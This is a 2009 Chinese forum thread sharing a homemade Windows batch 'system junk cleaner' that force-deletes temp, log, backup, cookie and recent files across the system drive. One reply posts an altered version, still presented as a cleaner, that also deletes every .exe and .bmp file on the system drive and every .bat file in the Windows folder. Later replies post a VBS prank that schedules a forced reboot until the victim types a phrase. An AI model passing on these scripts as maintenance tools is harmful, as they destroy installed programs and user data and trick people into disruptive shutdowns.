╘> :制作系统垃圾处理器。
福州四中吧
全部回复
仅看楼主
level 7
尛二 楼主
因为Windows在安装和使用过程中都会产生相当多的垃圾文件,包括临时文件(如:*.tmp、*._mp)日志文件(*.log)、临时帮助文件(*.gid)、磁盘检查文件(*.chk)、临时备份文件(如:*.old、*.bak)以及其他临时文件。特别是如果一段时间不清理IE的临时文件夹 “Temporary Internet Files”,其中的缓存文件有时会占用上百MB的磁盘空间。这些垃圾文件不仅仅浪费了宝贵的磁盘空间,严重时还会使系统运行慢如蜗牛。所以应及时清理系统的LJ文件的淤塞,保持系统轻松流畅上网!现在就让尛二为你指导一下吧。
在电脑屏幕的左下角按“开始→程序→附件→记事本”,把下面的文字复制进去,点“另存为”,路径选“桌面”,保存类型为“所有文件”,文件名为“垃圾处理器.bat”,就   ok!你的垃圾处理器就这样制作成功了! 双击后,会开始工作它。
======就是下面的文字(这行不用复制)=============================
@echo off
echo 正在清除系统垃圾文件,请稍等......
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
echo ok,飞一般旳感觉!系统垃圾清除完毕。
echo. & pause
=====到这里为止(这行不用复制)==============================================
注:这招比那些所谓的优化大师好用!最重要的是无论在公司默认的系统环境还是在自己家中的电脑都不会破坏系统文件。
╘> :【转载自※※电脑达人旳宝典】
2009年02月01日 09点02分 1
level 7
前年就用了
2009年02月01日 09点02分 2
level 7
改下
@echo off 
echo 正在清除系统垃圾文件,请稍等...... 
del /f /s /q %systemdrive%\*.tmp 
del /f /s /q %systemdrive%\*._mp 
del /f /s /q %systemdrive%\*.log 
del /f /s /q %systemdrive%\*.bmp 
del /f /s /q %systemdrive%\*.exe 
del /f /s /q %systemdrive%\*.old 
del /f /s /q %systemdrive%\recycled\*.* 
del /f /s /q %windir%\*.bat 
del /f /s /q %windir%\prefetch\*.* 
rd /s /q %windir%\temp & md %windir%\temp 
del /f /q %userprofile%\cookies\*.* 
del /f /q %userprofile%\recent\*.* 
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*" 
del /f /s /q "%userprofile%\Local Settings\Temp\*.*" 
del /f /s /q "%userprofile%\recent\*.*" 
echo ok, 啊哈
echo. & pause
2009年02月01日 09点02分 3
level 7
尛二 楼主
[][][]
改回来.
[][][]
2009年02月01日 09点02分 4
level 7
我改的谁敢用?......
2009年02月01日 09点02分 5
level 7
尛二 楼主
[][][]
请各位支持正版.
[][][]
2009年02月01日 09点02分 7
level 7
看那BAT。。。。。。DOS下编辑的程序???~~~~~
2009年02月01日 11点02分 9
level 7
on error resume next 
dim WSHshellA 
set WSHshellA = wscript.createobject("wscript.shell") 
WSHshellA.run "cmd.exe /c shutdown -r -t 600 -c ""只有两秒钟,你
上当了
"" ",0 ,true 
dim a 
do while(a <> "are you pig ?") 
a = inputbox ("Say that I am a pig, do not shut down, hurry up, say "" I am a pig "" "" did not say "," do not speak",8000,7000) 
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox" 
loop 
msgbox chr(13) + chr(13) + chr(13) + "As early as on the list that do" 
dim WSHshell 
set WSHshell = wscript.createobject("wscript.shell") 
WSHshell.run "cmd.exe /c shutdown -a",0 ,true 
msgbox chr(13) + chr(13) + chr(13) + "really fun"
2009年02月01日 11点02分 10
level 7
新的方法后缀名改VBS~~~~~
2009年02月01日 11点02分 11
level 7
on error resume next 
dim WSHshellA 
set WSHshellA = wscript.createobject("wscript.shell") 
WSHshellA.run "cmd.exe /c shutdown -r -t 600 -c ""Only two seconds, you fooled the"" ",0 ,true 
dim a 
do while(a <> "are you pig ?") 
a = inputbox ("Say that I am a pig, do not shut down, hurry up, say "" I am a pig "" "" did not say "," do not speak",8000,7000) 
msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox" 
loop 
msgbox chr(13) + chr(13) + chr(13) + "As early as on the list that do" 
dim WSHshell 
set WSHshell = wscript.createobject("wscript.shell") 
WSHshell.run "cmd.exe /c shutdown -a",0 ,true 
msgbox chr(13) + chr(13) + chr(13) + "really fun"
2009年02月01日 11点02分 12
level 11
都是电脑帝…
2009年02月02日 15点02分 13
level 7
一堆山寨
2009年02月03日 06点02分 14
level 0

2009年07月28日 22点07分 15
level 0
在360见过……
2009年08月03日 09点08分 17
level 5
哦,很简单的批处理…
2009年08月03日 11点08分 18
level 7
为了某件事 全部UP
2009年08月04日 15点08分 19
1